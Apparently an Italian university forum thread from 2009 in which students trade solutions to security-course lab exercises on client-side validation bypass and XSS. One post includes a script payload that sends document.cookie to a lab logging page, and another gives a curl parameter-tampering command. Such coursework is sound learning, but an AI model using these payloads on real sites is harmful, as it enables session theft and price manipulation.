Dsy Network www | forum | my | didattica | howto | wiki | el goog | stats | blog | dona | rappresentanti
Homepage
 Register   Calendar   Members  Faq   Search  Logout 
.dsy:it. : Powered by vBulletin version 2.3.1 .dsy:it. > Didattica > Corsi N - Z > Sicurezza > Esercizi laboratorio
  Last Thread   Next Thread
Author
Thread    Expand all | Contract all    Post New Thread    Post A Reply
Collapse
edima
walkingman

User info:
Registered: May 2003
Posts: 129 (0.02 al dì)
Location: Milano
Corso: Diploma universitario di informatica
Anno: 3
Time Online: 1 Day, 8:03:43 [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged
Esercizi laboratorio

Qualcuno mi puo' spiegare come funziona questo esercizio?

http://giove.laser.dico.unimi.it/si...dden/hidden.php

Ho messo 0.1 o 0.5, come input, il valore del prezzo e' minore del valore unitario, ma l'esercizio dice che non l'ho superato..... Come si fa?

Non riesco a risolvere gli esecizi sul controllo Javascript, non riesco a passare il controllo delle regular expression.

-------------

Invece per la soluzione del primo esercizio sugli XSSho trovato questa stinga che risolve l'esercizio. Vi torna?

<SCRIPT>document.location='http://giove.laser.dico.unimi.it/sicurezza0809/xss1/log.php?cookie='+document.cookie</SCRIPT>

Last edited by edima on 27-02-2009 at 01:01

26-02-2009 22:42
Click Here to See the Profile for edima Click here to Send edima a Private Message Find more posts by edima Add edima to your buddy list Printer Friendly version Email this Article to a friend Reply w/Quote
Collapse
edima
walkingman

User info:
Registered: May 2003
Posts: 129 (0.02 al dì)
Location: Milano
Corso: Diploma universitario di informatica
Anno: 3
Time Online: 1 Day, 8:03:43 [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

Aiuto!!! Non riesco a passare manco questo esercizio! Mi quota tutti i caratteri speciali, non riesco ad imbrogliarlo. Qualcuno ha la soluzione?

http://giove.laser.dico.unimi.it/si...nome=%22ciao%22

Ciao! Grazie

27-02-2009 22:48
Click Here to See the Profile for edima Click here to Send edima a Private Message Find more posts by edima Add edima to your buddy list Printer Friendly version Email this Article to a friend Reply w/Quote
Collapse
pamarcan
.primate.

User info:
Registered: Mar 2006
Posts: 68 (0.01 al dì)
Location:
Corso: informatica
Anno:
Time Online: 1 Day, 7:02:16 [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

Il primo dei due esercizi serve per mostrare la debolezza dei controlli fatti lato client.
Puoi usare o un proxy tipo webscarab o qualche plugin del browser che intercetti gli header http, insomma qualcosa che scavalchi i controlli fatti sul client.
Ad esempio: dopo aver impostato il browser verso il proxy (quindi su localhost) imposti il proxy di webscarab per intercettare gli headers, magari solo dal sito che t'interessa,
Così, inviando dal browser i dati ben formati (così da superare il controllo) webscarab li intercetterà, e potrai modificare i parametri passati come vorrai.

Per il secondo esercizio usi lo stesso metodo (proxy o simili), e inserisci tra i parametri passati che intercetti lo script in php (riferito però a quell'esercizio) che hai postato sopra.
(Attenzione che il parametro potrebbe essere anche passato tramite una form)

01-03-2009 16:01
Click Here to See the Profile for pamarcan Click here to Send pamarcan a Private Message Find more posts by pamarcan Add pamarcan to your buddy list Printer Friendly version Email this Article to a friend Reply w/Quote
Collapse
edima
walkingman

User info:
Registered: May 2003
Posts: 129 (0.02 al dì)
Location: Milano
Corso: Diploma universitario di informatica
Anno: 3
Time Online: 1 Day, 8:03:43 [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

Grazio 10000! Ho messo su webscrab ho modificato il parametro come hai detto, ed e' andato!!

Ho fatto anche quello javascript. Basta disabilitare il controllo javascript sostituendo:

<input type="button" onclick="javascript: controlla();" value="Invia">

con

<input type="submit" value="Invia">

Veramente grazie ancora!


Non riesco invece a superare i due esercizi XSS, quelli dove l'output dal server risulta filtrato. Secondo me per quelli c'e' da fare passare qualche sequenza sfruttando la differenza di encoding dei caratteri, in modo da fare ritornare dal sever caratteri tipo < o > o ". Ma non riesco a trovare la sequenza corretta. Ho provato con tutti i caratteri codice maggiore di 128 ma non fuziona...

Last edited by edima on 01-03-2009 at 17:57

01-03-2009 16:39
Click Here to See the Profile for edima Click here to Send edima a Private Message Find more posts by edima Add edima to your buddy list Printer Friendly version Email this Article to a friend Reply w/Quote
Collapse
edima
walkingman

User info:
Registered: May 2003
Posts: 129 (0.02 al dì)
Location: Milano
Corso: Diploma universitario di informatica
Anno: 3
Time Online: 1 Day, 8:03:43 [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

Ho risolto il primo esercizio con curl:

curl --anyauth --basic --user XXX:YYY --data "qt=12&prezzo=123&compra=Compra" http://giove.laser.dico.unimi.it/si...dden/hidden.php

XXX:YYY sono nome utente e password del laboratorio

01-03-2009 21:45
Click Here to See the Profile for edima Click here to Send edima a Private Message Find more posts by edima Add edima to your buddy list Printer Friendly version Email this Article to a friend Reply w/Quote
All times are GMT. The time now is 10:30.    Post New Thread    Post A Reply
  Last Thread   Next Thread
Show Printable Version | Email this Page | Subscribe to this Thread | Add to Bookmarks

Forum Jump:
Rate This Thread:

Forum Rules:
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is OFF
vB code is ON
Smilies are ON
[IMG] code is ON
 

Powered by: vBulletin v2.3.1 - Copyright ©2000 - 2002, Jelsoft Enterprises Limited
Mantained by dsy crew (email) | Collabora con noi | Segnalaci un bug | Archive | Regolamento | Licenze | Thanks | Syndacate
Pagina generata in 0.045 seconds (79.92% PHP - 20.08% MySQL) con 27 query.